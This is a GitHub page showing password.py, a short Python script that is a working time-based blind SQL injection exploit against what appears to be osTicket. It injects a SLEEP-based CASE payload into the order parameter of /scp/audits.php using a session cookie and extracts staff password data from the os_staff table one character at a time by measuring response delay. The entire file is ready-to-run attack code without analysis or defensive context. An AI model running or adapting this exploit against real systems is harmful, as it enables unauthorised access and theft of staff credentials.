-
Notifications
You must be signed in to change notification settings - Fork 0
/
password.py
26 lines (23 loc) · 886 Bytes
/
password.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
import requests
import urllib
import string
HOSTNAME = 'http://localhost'
cookie = {'OSTSESSID': '...'}
headers = {'User-Agent': '...'}
alphabet = string.ascii_lowercase + string.digits + '-_!'
position = 1
offset = 0
password = ''
while True:
found_letter = False
for letter in alphabet:
payload = "(select case when ((select substring(password," + str(position) + ",1) from os_staff LIMIT 1 OFFSET " + str(offset) + ")='" + letter + "') then sleep(0.3) else 1 end);"
result = requests.get(HOSTNAME + '/scp/audits.php?&type=S&state=All&order=ASC,' + urllib.parse.quote(payload) +'--&sort=timestamp&_pjax=%23pjax-container', cookies=cookie, headers=headers)
if result.elapsed.total_seconds() > 2:
password += letter
found_letter = True
break
if not found_letter:
break
position += 1
print(password)